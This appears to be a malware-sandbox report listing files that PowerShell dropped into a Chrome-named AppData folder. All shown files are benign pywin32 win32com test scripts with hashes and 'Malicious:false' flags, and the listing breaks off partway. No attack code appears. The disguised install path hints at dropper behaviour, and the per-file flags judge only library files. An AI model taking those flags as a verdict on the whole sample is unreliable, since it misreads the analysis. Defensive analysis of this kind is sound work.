                                                                                                                                                                                                  Preview:# testDictionary.py.#.import sys.import unittest..import pythoncom.import pywintypes.import win32com.client.import win32com.server.util.import win32com.test.util.import win32timezone.import winerror...def MakeTestDictionary():. return win32com.client.Dispatch("Python.Dictionary")...def TestDictAgainst(dict, check):. for key, value in list(check.items()):. if dict(key) != value:. raise Exception(. "Indexing for '%s' gave the incorrect value - %s/%s". % (repr(key), repr(dict[key]), repr(check[key])). )...# Ensure we have the correct version registered..def Register(quiet):. import win32com.servers.dictionary. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(win32com.servers.dictionary.__file__, "Python.Dictionary")...def TestDict(quiet=None):. if quiet is None:. quiet = not "-v" in sys.argv. Register(quiet).. if not quiet:. print("Simple enum test"). dict = MakeTe

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testDictionary.vbs

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                  Entropy (8bit):4.791868337373185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:0LgDzTQWXwwz/LrLDHvGoKolY/Zft/ZPIlY/zft/JZlYpKo+KM:0c/T5zvHHBKo8ft1Iqftvk4
                                                                                                                                                                                                  MD5:4A0B181C7EB4DFE1D6AD6F9F624819E1
                                                                                                                                                                                                  SHA1:6119A9D849F01EF479EFDAE0D4A027AD1F6A7D49
                                                                                                                                                                                                  SHA-256:5EE4E64715101EFABB04C085EFBB21513B84083DB75DA382F6D55550E1886DDD
                                                                                                                                                                                                  SHA-512:1B6278E2DB156A17E93F56E1A5368728A7F388BCFD18A6BA5C4B16D7381F5E4DB5AA63ADDF472026CD21493517F6AA6E906ECBE1D4EA30AE99702D61D3BFD88E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:' Test Pyhon.Dictionary using VBScript - this uses.' IDispatchEx, so is an interesting test...set ob = CreateObject("Python.Dictionary").ob("hello") = "there".' Our keys are case insensitive..ob.Item("hi") = ob("HELLO")..dim ok.ok = true..if ob("hello") <> "there" then. WScript.Echo "**** The dictionary value was wrong!!". ok = false.end if..if ob("hi") <> "there" then. WScript.Echo "**** The other dictionary value was wrong!!". ok = false.end if..if ok then. WScript.Echo "VBScript has successfully tested Python.Dictionary".end if...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testDynamic.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2804
                                                                                                                                                                                                  Entropy (8bit):4.742689327797385
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:pj/+4iDAuZVD0DBqo1PRtL7NZZ3BwVyPwkkh+wLwRFchp1HfnzxPR6fUw3:pj/+plYDBqOP/vNj3B1Pjkh+wLwR2p16
                                                                                                                                                                                                  MD5:34345C0FE1B2605EA43CA6C014CDBE25
                                                                                                                                                                                                  SHA1:E879449AB2225EA74E3506FBCAA1B36B9C375B3B
                                                                                                                                                                                                  SHA-256:CA546589378D8261628BFAC677F08848C26BD712F758B183257C8E9879F76540
                                                                                                                                                                                                  SHA-512:83AD050EF1919128D7B5DC103BD5E903BF6A7F94B0D082CCE0A00E7669A0D446ECE0B070FD9F814D485ABC793D05E9B655B3203EECFF78687D3FD7B77A7AA553
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test dynamic policy, and running object table...import pythoncom.import winerror.from win32com.server.exception import Exception..error = "testDynamic error"..iid = pythoncom.MakeIID("{b48969a0-784b-11d0-ae71-d23f56000000}")...class VeryPermissive:. def _dynamic_(self, name, lcid, wFlags, args):. if wFlags & pythoncom.DISPATCH_METHOD:. return getattr(self, name)(*args).. if wFlags & pythoncom.DISPATCH_PROPERTYGET:. try:. # to avoid problems with byref param handling, tuple results are converted to lists.. ret = self.__dict__[name]. if type(ret) == type(()):. ret = list(ret). return ret. except KeyError: # Probably a method request.. raise Exception(scode=winerror.DISP_E_MEMBERNOTFOUND).. if wFlags & (. pythoncom.DISPATCH_PROPERTYPUT | pythoncom.DISPATCH_PROPERTYPUTREF. ):. setattr(self, name, args[0]).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testExchange.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3352
                                                                                                                                                                                                  Entropy (8bit):4.652152477434712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ijrxeSZ1OaUK0TgSWfQ6se/i64wJp4/KQ6NmWh:izoafQWrjE/KgWh
                                                                                                                                                                                                  MD5:2530256B7E23ED31D5DF61442F4D6FAF
                                                                                                                                                                                                  SHA1:BC02A5B9CA389D7C93B4295D16F65E3509D7E8A4
                                                                                                                                                                                                  SHA-256:B4B6A1006FE02AA541C785E98921ABF01FF70996955BCCBD8D39488CED38D1BE
                                                                                                                                                                                                  SHA-512:7ED2D6B06B9EE310CE72617036E992CF7029093BA0FD349B95F15DAED5D64C9B916E72B80C042B0EAD191AAC9F154DC2095CE152D5DE77EFF7445383A39B6768
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# TestExchange = Exchange Server Dump.# Note that this code uses "CDO", which is unlikely to get the best choice..# You should use the Outlook object model, or.# the win32com.mapi examples for a low-level interface...import os..import pythoncom.from win32com.client import constants, gencache..ammodule = None # was the generated module!...def GetDefaultProfileName():. import win32api. import win32con.. try:. key = win32api.RegOpenKey(. win32con.HKEY_CURRENT_USER,. "Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles",. ). try:. return win32api.RegQueryValueEx(key, "DefaultProfile")[0]. finally:. key.Close(). except win32api.error:. return None...#.# Recursive dump of folders..#.def DumpFolder(folder, indent=0):. print(" " * indent, folder.Name). folders = folder.Folders. folder = folders.GetFirst(). while folder:. DumpFolder(folder, indent + 1

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testExplorer.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4715
                                                                                                                                                                                                  Entropy (8bit):4.743526043842491
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:NNmAGmq5Wa/2CjYkYJtnjwA7eS9z5cjpewMAvghKtWZmEK7s3z53YJJI9g:ImqLJW7X9z2NewJvfah9g
                                                                                                                                                                                                  MD5:EC289A6CAA4E9C5770652DE63B75C1B1
                                                                                                                                                                                                  SHA1:C04C0CBDB1C5E3B97855EFC32ECAFE862D590226
                                                                                                                                                                                                  SHA-256:754AAE922EF48234E3445F61153F44C6AC20B0E51F5640BBC94632B7BB8D8173
                                                                                                                                                                                                  SHA-512:BB3FFAC5BEC93BBBFBA8675DB5BD25A0361D1EDFF74373D656659510049B3B618AC67408B66E74DE5C3F99DC4250C5532B2E9F172FB4E86B9CA27E65E2070487
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# testExplorer -..import os.import time..import pythoncom.import win32api.import win32com.client.dynamic.import win32con.import win32gui.import winerror.from win32com.client import Dispatch.from win32com.test.util import CheckClean..bVisibleEventFired = 0..# These are errors we might see when this is run in automation (eg, on github).# Not sure exactly what -2125463506 is, but google shows it's a common error.# possibly related to how IE is configured WRT site permissions etc..HRESULTS_IN_AUTOMATION = [-2125463506, winerror.MK_E_UNAVAILABLE]...class ExplorerEvents:. def OnVisible(self, visible):. global bVisibleEventFired. bVisibleEventFired = 1...def TestExplorerEvents():. global bVisibleEventFired. try:. iexplore = win32com.client.DispatchWithEvents(. "InternetExplorer.Application", ExplorerEvents. ). except pythoncom.com_error as exc:. # In automation we see this error trying to connect to events. # It's a little surpr

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testGIT.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4690
                                                                                                                                                                                                  Entropy (8bit):4.673785465015909
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CsDGCGnLwjQDYNv9JXNKXKqGpCy/89oS/mTdLpQSpk6dISpX/BwP5w4tlz:5eLGNv93KwCCmudL7k6dISlBwBPlz
                                                                                                                                                                                                  MD5:0B1D6AFED5275FDD6488C6EC39512B5B
                                                                                                                                                                                                  SHA1:7836196313A3086090424C7DBE1CAE96BEC9E86E
                                                                                                                                                                                                  SHA-256:3E9F52214205CE936059D4FE3645D2A10445BB5753D55A675ABE872A399255C6
                                                                                                                                                                                                  SHA-512:26D96A644F92A24DF83E4722DB4B0178662B7EFC709D216C41EDA8EEEEC57F050765894BA761A8BDB77D6D1E85198418FFE1F90330CCB200F698F985AABC7CDF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Testing pasing object between multiple COM threads..Uses standard COM marshalling to pass objects between threads. Even .though Python generally seems to work when you just pass COM objects.between threads, it shouldnt...This shows the "correct" way to do it...It shows that although we create new threads to use the Python.Interpreter,.COM marshalls back all calls to that object to the main Python thread,.which must be running a message loop (as this sample does)...When this test is run in "free threaded" mode (at this stage, you must .manually mark the COM objects as "ThreadingModel=Free", or run from a .service which has marked itself as free-threaded), then no marshalling.is done, and the Python.Interpreter object start doing the "expected" thing.- ie, it reports being on the same thread as its caller!..Python.exe needs a good way to mark itself as FreeThreaded - at the moment.this is a pain in the but!.."""..import _thread.import traceback..import pythoncom.import win32api.impor

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testGatewayAddresses.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5217
                                                                                                                                                                                                  Entropy (8bit):4.942059394615528
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7cXRiARipcbmzRuBpaANS/6dFKhf3c4aQL9jn0eU/FWrqC4Yz4yWb0exmWF:YhiAs7cpaANS/6mhf35aWn0R/kjfI0sF
                                                                                                                                                                                                  MD5:4A8FC8A433F2A7D13360CE817289CB81
                                                                                                                                                                                                  SHA1:9D1C83E9F8BDB616CD1D9065967DAB4E25634064
                                                                                                                                                                                                  SHA-256:F30E1BA0417B24172C1FF58660AAC074DBD1C54C6EB8F8A2586DFCCA33E395EE
                                                                                                                                                                                                  SHA-512:0D55B08727E4A6401103701CA7E16DB3AF41228A6291BF1ADA7BB1E5D133CED59AD42E5D2E6A566D60F86AFFD682907D60E663CA7FF4FC2F8FF716E3B7D6EDD5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# The purpose of this test is to ensure that the gateways objects.# do the right thing WRT COM rules about object identity etc...# Also includes a basic test that we support inheritance correctly in.# gateway interfaces...# For our test, we create an object of type IID_IPersistStorage.# This interface derives from IPersist..# Therefore, QI's for IID_IDispatch, IID_IUnknown, IID_IPersist and.# IID_IPersistStorage should all return the same gateway object..#.# In addition, the interface should only need to declare itself as.# using the IPersistStorage interface, and as the gateway derives.# from IPersist, it should automatically be available without declaration..#.# We also create an object of type IID_I??, and perform a QI for it..# We then jump through a number of hoops, ensuring that the objects.# returned by the QIs follow all the rules..#.# Here is Gregs summary of the rules:.# 1) the set of supported interfaces is static and unchanging.# 2) symmetric: if you QI an interface for tha

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testInterp.vbs

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258
                                                                                                                                                                                                  Entropy (8bit):4.973447807182621
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:xaLuNfJxJoYlYgbYhMYjthaYlY/3r2VlYal5WY:gUfNoYlYeYhZRUYlY/3KlYaj
                                                                                                                                                                                                  MD5:93C0BD59A8C2D696C823E2E5677A3614
                                                                                                                                                                                                  SHA1:E255BA0F245DDBB3C2BC942C1972B01739474C46
                                                                                                                                                                                                  SHA-256:E63B2A8041F683492E83C1FDAC3A0C94E3F6CB29CFFB54F9D97D4EB06A9A4E0A
                                                                                                                                                                                                  SHA-512:56C20680EB052703D3A985947E8848B902F09BE04332A841296C81CCADE0AFE1828B6E0246F198884D5909B954A1D195E0A97726C322A3420E714D538DF7173E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:set o = CreateObject("Python.Interpreter").if o.Eval("1+1") <> 2 Then..WScript.Echo "Eval('1+1') failed"..bFailed = True.end if..if bFailed then..WScript.Echo "*********** VBScript tests failed *********".else..WScript.Echo "VBScript test worked OK".end if..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testIterators.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4619
                                                                                                                                                                                                  Entropy (8bit):4.557164968331504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:cGPxZ5eqIKLQiILEK2hLR4j8DQS02mrrXBauzSr:cGljl/DQ7rrXBvzSr
                                                                                                                                                                                                  MD5:D6E43ABD662B3698AF48DF23BAF33ACF
                                                                                                                                                                                                  SHA1:9E81C3AA827555EAD43216D9815A8DE106B49452
                                                                                                                                                                                                  SHA-256:86CCF25000C05F5BFA6A3EC489408370976244B302C545B8C9DDFF982BF38E25
                                                                                                                                                                                                  SHA-512:10F067B8B42BEFB3559669C745CC2EF2392ED342E96FBC3CADFD642A603EEA0E3E7B63376D7FE7EA0A3FE065DF84B82C569B48FFBF40B7776C65397DF30786CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Some raw iter tests. Some "high-level" iterator tests can be found in.# testvb.py and testOutlook.py.import sys.import unittest..import pythoncom.import win32com.server.util.import win32com.test.util.from win32com.client import Dispatch.from win32com.client.gencache import EnsureDispatch...class _BaseTestCase(win32com.test.util.TestCase):. def test_enumvariant_vb(self):. ob, iter = self.iter_factory(). got = []. for v in iter:. got.append(v). self.assertEqual(got, self.expected_data).. def test_yield(self):. ob, i = self.iter_factory(). got = []. for v in iter(i):. got.append(v). self.assertEqual(got, self.expected_data).. def _do_test_nonenum(self, object):. try:. for i in object:. pass. self.fail("Could iterate over a non-iterable object"). except TypeError:. pass # this is expected.. self.assertRaises(TypeError, iter, object)

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testMSOffice.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6086
                                                                                                                                                                                                  Entropy (8bit):4.821038674490074
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:v3vSFVg06AFunmltsBlFcg7NC8On0m8dh/pfysJn165OLxLcQmUFAz4dMl4HXOHk:ybFDumSzcqNCplsfysOOLlcQmUiz4d0Y
                                                                                                                                                                                                  MD5:BE75D074D20E8CE52BE10E0CE63DC5B1
                                                                                                                                                                                                  SHA1:A408EBA472244E2676068A111155E3AB0FBA53CF
                                                                                                                                                                                                  SHA-256:7D7BCDD7AA21E9CC2F474B290FBFACE2B75C8A6FE7E727A2C25B11E218955DE3
                                                                                                                                                                                                  SHA-512:21F8DA2372D9A6F5E35CBE923CEA66F2371053421C79478CECA1A119DDEFF0901281FCC4696FC5FDD1E336B06D56C5F58C9600B9E39A8B23DFC06CFBD2AAB2D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test MSOffice.#.# Main purpose of test is to ensure that Dynamic COM objects.# work as expected...# Assumes Word and Excel installed on your machine...import traceback..import pythoncom.import win32api.import win32com.import win32com.client.dynamic.from pywintypes import Unicode.from win32com.client import gencache.from win32com.test.util import CheckClean..error = "MSOffice test error"...# Test a few of the MSOffice components..def TestWord():. # Try and load the object exposed by Word 8. # Office 97 - _totally_ different object model!. try:. # NOTE - using "client.Dispatch" would return an msword8.py instance!. print("Starting Word 8 for dynamic test"). word = win32com.client.dynamic.Dispatch("Word.Application"). TestWord8(word).. word = None. # Now we will test Dispatch without the new "lazy" capabilities. print("Starting Word 8 for non-lazy dynamic test"). dispatch = win32com.client.dynamic._GetGoodDispatch("Word.Ap

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testMSOfficeEvents.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3982
                                                                                                                                                                                                  Entropy (8bit):4.479543856143631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ZOmeajyzPZjpBgJAIhEukjLTWnb8Zh/3dHmjX:Z+7ZjpKJA4EumTWIH3pmjX
                                                                                                                                                                                                  MD5:E75E0A1472926AF4457460CFCB356166
                                                                                                                                                                                                  SHA1:0EF73BCA733F310F398654BAEAF794E42BAACB2F
                                                                                                                                                                                                  SHA-256:A9F9668F46223A15A8EF94335C574367BDC92B10A90AF85E5BBBF13529A6DE7C
                                                                                                                                                                                                  SHA-512:1172314C09E60467052F583476DA13406E78B74DD07A9B30D4B88DD729CDA4A99101818D820A49CA8734BA3AD3714CD76F55FE377DFE0EAFA374F5E530440AE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# OfficeEvents - test/demonstrate events with Word and Excel..import msvcrt.import sys.import threading.import time.import types..import pythoncom.from win32com.client import Dispatch, DispatchWithEvents..stopEvent = threading.Event()...def TestExcel():. class ExcelEvents:. def OnNewWorkbook(self, wb):. if type(wb) != types.InstanceType:. raise RuntimeError(. "The transformer doesnt appear to have translated this for us!". ). self.seen_events["OnNewWorkbook"] = None.. def OnWindowActivate(self, wb, wn):. if type(wb) != types.InstanceType or type(wn) != types.InstanceType:. raise RuntimeError(. "The transformer doesnt appear to have translated this for us!". ). self.seen_events["OnWindowActivate"] = None.. def OnWindowDeactivate(self, wb, wn):. self.seen_events["OnWindowDeactivate"] = None.. def OnSheetDea

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testMarshal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6069
                                                                                                                                                                                                  Entropy (8bit):4.4438118253540395
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:UsDGCgnLwjQIPJW2HC9ys/J/a8q6QaNTF19Tg2q6PMpYC4jE/fks7O1fhAHuXQhd:zYLkG9H/Jad6QaN51dC6PMpeQfkCOBhs
                                                                                                                                                                                                  MD5:5476DA59124678C0013F0085B6421DCB
                                                                                                                                                                                                  SHA1:246909EF6B78B16DA3FE850238631F3C6A570F9B
                                                                                                                                                                                                  SHA-256:04D0631A16D9CB712EBBE4AC79980F1D1D959A21C4077CA623C9A5BF98BAB03E
                                                                                                                                                                                                  SHA-512:F3D18F0D3DA18B108DBAC3D8B06F3D03F5DD640706F07E5992799E4EE1358CFD8C65275722FF295A201352CFC6C9697B56D13F4E86BD43B15B718AC50F00E898
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Testing pasing object between multiple COM threads..Uses standard COM marshalling to pass objects between threads. Even.though Python generally seems to work when you just pass COM objects.between threads, it shouldnt...This shows the "correct" way to do it...It shows that although we create new threads to use the Python.Interpreter,.COM marshalls back all calls to that object to the main Python thread,.which must be running a message loop (as this sample does)...When this test is run in "free threaded" mode (at this stage, you must.manually mark the COM objects as "ThreadingModel=Free", or run from a.service which has marked itself as free-threaded), then no marshalling.is done, and the Python.Interpreter object start doing the "expected" thing.- ie, it reports being on the same thread as its caller!..Python.exe needs a good way to mark itself as FreeThreaded - at the moment.this is a pain in the but!.."""..import threading.import unittest..import pythoncom.import win32api.import

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testNetscape.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):660
                                                                                                                                                                                                  Entropy (8bit):4.474333029501136
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:joXCA1d0yJUZiaF2p0QpFZp38M7tm+ZhZ+4KJFkd7addbMTd7NIFGlaux5044i:j9gUYa0pprX3nZm+Z64KQd7chYd7NLEE
                                                                                                                                                                                                  MD5:E5BC0AD44019706CF0B5D95842253F50
                                                                                                                                                                                                  SHA1:96021E0ADA31F526BF2F1A828734C0A7A3EC27BA
                                                                                                                                                                                                  SHA-256:E484EDA75EDAFA3A89D25CC0A6E01C281874F7F8F6B2BB369EAA27E2FB7C3D80
                                                                                                                                                                                                  SHA-512:68E401C41EC08D57BF603735E636A2923D444AF466A0C0987E3FD5E6F96DB0870243E8C1EA3785D0F9215AB1FEC768838A535B642EF7C6E1AF7F9177B71FED87
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:## AHH - I cant make this work!!!..# But this is the general idea...import sys..import netscape..error = "Netscape Test Error"..if __name__ == "__main__":. n = netscape.CNetworkCX(). rc = n.Open("http://d|/temp/apyext.html", 0, None, 0, None). if not rc:. raise error("Open method of Netscape failed"). while 1:. num, str = n.Read(None, 0). print("Got ", num, str). if num == 0:. break # used to be continue - no idea!!. if num == -1:. break. # sys.stdout.write(str). n.Close(). print("Done!"). del n. sys.last_type = sys.last_value = sys.last_traceback = None.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testPersist.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6397
                                                                                                                                                                                                  Entropy (8bit):4.814124921271407
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sj1dQLZ/v93jNQqEdvEqxA88yfc6RaRS5AsxrzMVo:g1dQLZ/v93jNQqEdvEq30spMm
                                                                                                                                                                                                  MD5:9D0E938988F57EF84E20F84060B2D986
                                                                                                                                                                                                  SHA1:08FF3AA31C2E0AAB02B247FF6606C733FDFEB4B7
                                                                                                                                                                                                  SHA-256:D37175FA212C13E1751F7D97D8452F6801ABB91E52F35A000F35B9BE2018A7EF
                                                                                                                                                                                                  SHA-512:B851C3A7EEDD298D5FFCA2CC2263ED9D836AA7600A6BB83A2E7E3A1DCB0C239B751FB3A81D4D1D96A2BD79A5B71C026FF3DFA864EEF4C8120A253434459116B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import pythoncom.import pywintypes.import win32api.import win32com.import win32com.client.import win32com.client.dynamic.import win32com.server.util.import win32ui.from pywin32_testutil import str2bytes.from pywintypes import Unicode.from win32com import storagecon.from win32com.axcontrol import axcontrol.from win32com.test.util import CheckClean..S_OK = 0...import win32timezone..now = win32timezone.now()...class LockBytes:. _public_methods_ = [. "ReadAt",. "WriteAt",. "Flush",. "SetSize",. "LockRegion",. "UnlockRegion",. "Stat",. ]. _com_interfaces_ = [pythoncom.IID_ILockBytes].. def __init__(self, data=""):. self.data = str2bytes(data). self.ctime = now. self.mtime = now. self.atime = now.. def ReadAt(self, offset, cb):. print("ReadAt"). result = self.data[offset : offset + cb]. return result.. def WriteAt(self, offset, data):. print("WriteAt " + str(o

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testPippo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2700
                                                                                                                                                                                                  Entropy (8bit):4.559955566559269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:kbexmD7EdAgFlhdY9ot0qHerVcXx3AgFlhdHCtFfS:kbexmD7g7Y9o0rVchV7HC3q
                                                                                                                                                                                                  MD5:9CE54462DB78DE2E99A586E18F2A3C3F
                                                                                                                                                                                                  SHA1:D6671055DCCFC76DA924B9FF9CAFC6E7BEE90B52
                                                                                                                                                                                                  SHA-256:CAC4BF53997469326FECB9603F0B8C4CCAEE479C61ACD14191259D1B3AFF3AC4
                                                                                                                                                                                                  SHA-512:C097E2F75CD011C2922C7C00821A0E7A168B6C8669B8AA9D86450ED77D9A71A74C8E38DAED4CFD562CC6C6A15D10620846D60F076805DE1DC02DF85251E26A9E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys.import unittest..import pythoncom.from win32com.client import Dispatch.from win32com.client.gencache import EnsureDispatch...class PippoTester(unittest.TestCase):. def setUp(self):. from win32com.test import pippo_server. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(pippo_server.__file__, "Python.Test.Pippo"). # create it.. self.object = Dispatch("Python.Test.Pippo").. def testLeaks(self):. try:. gtrc = sys.gettotalrefcount. except AttributeError:. print("Please run this with python_d for leak tests"). gtrc = lambda: 0. # note creating self.object() should have consumed our "one time" leaks. self.object.Method1(). start = gtrc(). for i in range(1000):. object = Dispatch("Python.Test.Pippo"). object.Method1(). object = None. end = gtrc(). if end - start > 5:. self.fail("We lost %

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testPyComTest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29052
                                                                                                                                                                                                  Entropy (8bit):4.890042957890085
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vaMlDQn2MrKnG4uLxszu5eNNnlf26DnIS+L6lmkA/HwruHyWYjob:yMlDQn2eKnG4uLazuEFe+Yks3S+
                                                                                                                                                                                                  MD5:72DEAA8CD99A49B7E2460E1A7FA5B22A
                                                                                                                                                                                                  SHA1:D338F048C6E95CB5012288835F3AB3AAA871B863
                                                                                                                                                                                                  SHA-256:53A5CD16541259E1D495ED3E628018C6EB68158CF4B558725934E9280C033FDD
                                                                                                                                                                                                  SHA-512:06979383CAF513AFAEF2725EC2B54DE154D998D1E54D65417F285D88DDDA815CBD4758C1467AB7EC312070C0F66280603B31502E7A6FF277DCE75709A95F46D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# NOTE - Still seems to be a leak here somewhere.# gateway count doesnt hit zero. Hence the print statements!..import sys..sys.coinit_flags = 0 # Must be free-threaded!.import datetime.import decimal.import os.import time..import pythoncom.import pywintypes.import win32api.import win32com.import win32com.client.connect.import win32timezone.import winerror.from pywin32_testutil import str2memory.from win32com.client import VARIANT, CastTo, DispatchBaseClass, constants.from win32com.test.util import CheckClean, RegisterPythonServer..importMsg = "**** PyCOMTest is not installed ***\n PyCOMTest is a Python test specific COM client and server.\n It is likely this server is not installed on this machine\n To install the server, you must get the win32com sources\n and build it using MS Visual C++"..error = Exception..# This test uses a Python implemented COM server - ensure correctly registered..RegisterPythonServer(. os.path.join(os.path.dirname(__file__), "..", "servers", "test_pyc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testPyScriptlet.js

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
